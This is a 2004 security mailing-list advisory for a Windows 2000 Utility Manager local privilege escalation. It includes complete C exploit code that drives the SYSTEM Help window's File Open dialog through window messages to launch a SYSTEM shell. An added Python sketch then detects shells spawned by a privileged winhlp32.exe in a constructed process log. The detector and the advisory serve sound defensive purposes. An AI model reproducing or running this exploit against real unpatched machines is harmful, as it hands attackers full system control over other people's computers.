[EXPL] Utility Manager Local Privileges Escalation Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/18/04

    To: list@securiteam.com
    Date: 18 Apr 2004 10:47:27 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Utility Manager Local Privileges Escalation Exploit
    ------------------------------------------------------------------------

    SUMMARY

    The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with
    system privileges, which allows local users to execute arbitrary code via
    a "Shatter"-style attack (window messages sent from a less privileged
    process to the SYSTEM-owned Help window), as demonstrated using the
    File Open dialog in the Help window. The following exploit code can be
    used to test your system for the mentioned vulnerability.

    DETAILS

    Exploit:
    // By Cesar Cerrudo cesar appsecinc com
    // Local elevation of privileges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;
      POINT point;

      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager
      system("utilman.exe /start");
      Sleep(500);

      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(500);

      // open the File Open dialog window in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(500);

      // find open file dialog window
      lHandle = FindWindow("#32770","Open");

      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);
      Sleep(500);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
      Sleep(800);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

      //get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      //send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      Sleep(500);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      //get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      Sleep(500);
      
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);

      // get context menu handle
      point.x =10; point.y =30;
      lHandle2=WindowFromPoint(point);

      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

      return(0);
    }
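
    The code above leaves one durable artefact a defender can look for: a
    child process (here cmd.exe) spawned by a winhlp32.exe instance that runs
    as SYSTEM. The following detection sketch is an added example, not part of
    the original advisory or of Cesar Cerrudo's code. It parses constructed
    process-creation records in a made-up line format (the PIDs, user names
    and paths are all constructed) and reports any child of a privileged Help
    viewer, rating a shell child as high severity. The fix for the underlying
    issue is the vendor patch (MS04-011); this rule only helps spot unpatched
    hosts on which the escalation path is being exercised.

```python
"""Flag processes spawned by a SYSTEM-level Windows Help viewer.

Added example for the Utility Manager advisory above. The log line format
and every record in SAMPLE_LOG are constructed for this illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed record format (one process-creation event per line):
#   <time> pid=<n> ppid=<n> user=<name> image=<path> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<time>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) user=(?P<user>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>[^"]*)"$'
)

# Constructed sample: a user opens ordinary help (benign), then Utility Manager
# is started; the service-side utilman.exe (parent pid 232 is not logged)
# launches winhlp32.exe as SYSTEM, which in turn spawns cmd.exe.
SAMPLE_LOG = r"""
10:47:01 pid=1208 ppid=1000 user=CORP\alice image=C:\WINNT\explorer.exe cmd="explorer.exe"
10:47:05 pid=1236 ppid=1208 user=CORP\alice image=C:\WINNT\winhlp32.exe cmd="winhlp32.exe notepad.hlp"
10:47:10 pid=1340 ppid=1208 user=CORP\alice image=C:\WINNT\system32\utilman.exe cmd="utilman.exe /start"
10:47:10 pid=1352 ppid=232 user=SYSTEM image=C:\WINNT\system32\utilman.exe cmd="utilman.exe"
10:47:11 pid=1364 ppid=1352 user=SYSTEM image=C:\WINNT\winhlp32.exe cmd="winhlp32.exe"
10:47:13 pid=1380 ppid=1364 user=SYSTEM image=C:\WINNT\system32\cmd.exe cmd="cmd.exe"
"""

PRIVILEGED_USERS = {"SYSTEM"}          # accounts whose Help viewer must not spawn children
HELP_VIEWERS = {"winhlp32.exe"}        # the help process the advisory describes
SHELLS = {"cmd.exe", "command.com"}    # a shell child is the strongest signal


@dataclass(frozen=True)
class ProcEvent:
    time: str
    pid: int
    ppid: int
    user: str
    image: str
    cmd: str

    @property
    def basename(self) -> str:
        """Image file name without its directory, lower-cased for matching."""
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the constructed format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append(ProcEvent(m["time"], int(m["pid"]), int(m["ppid"]),
                                m["user"], m["image"], m["cmd"]))
    return events


def ancestry(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[str]:
    """Walk parents upward while they are present in the log (cycle-safe)."""
    chain, seen, cur = [ev.basename], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur.basename)
    return chain


def detect(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per child of a Help viewer running as a privileged user."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.basename not in HELP_VIEWERS:
            continue
        if parent.user not in PRIVILEGED_USERS:
            continue  # an ordinary user's help viewer is out of scope here
        findings.append({
            "time": ev.time,
            "pid": ev.pid,
            "image": ev.basename,
            "user": ev.user,
            "severity": "high" if ev.basename in SHELLS else "medium",
            "chain": " <- ".join(ancestry(ev, by_pid)),
        })
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"{f['time']} [{f['severity']}] pid {f['pid']} {f['image']} as {f['user']}: {f['chain']}")
```

    On the sample, only the SYSTEM cmd.exe (pid 1380) is reported, with the
    chain cmd.exe <- winhlp32.exe <- utilman.exe; the user's own help session
    and the SYSTEM help viewer that spawns nothing stay silent. Any child of a
    privileged help viewer is reported, not only cmd.exe, so the rule also
    covers a different program picked from the same dialog.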

    ADDITIONAL INFORMATION

    The information has been provided by Cesar Cerrudo
    <mailto:cesar@appsecinc.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

